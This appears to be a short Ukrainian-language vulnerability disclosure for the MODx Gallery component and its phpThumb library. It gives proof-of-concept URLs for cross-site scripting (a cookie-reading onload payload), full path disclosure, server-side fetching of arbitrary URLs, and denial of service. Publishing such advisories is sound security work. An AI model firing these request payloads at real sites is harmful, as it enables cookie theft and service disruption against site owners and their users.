Численні уразливості в Gallery для MODx
23:54 22.04.2015У липні, 31.07.2014, я виявив численні уразливості в Gallery для MODx. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service уразливості. Про що найближчим часом повідомлю розробникам веб додатку.
В компоненті Gallery для MODx використовуються phpThumb. Ця бібліотека має XSS, FPD, AoF і DoS в уразливості подібні до TimThumb, тому Gallery теж вразливий.
XSS (WASC-08):
http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/assets/components/gallery/connector.php?action=web/phpthumb
http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://
Abuse of Functionality (WASC-42):
http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://site&h=1&w=1
Denial of Service (WASC-10):
http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=src=http://site/big_file&h=1&w=1
Уразливі всі версії компонента Gallery для MODx.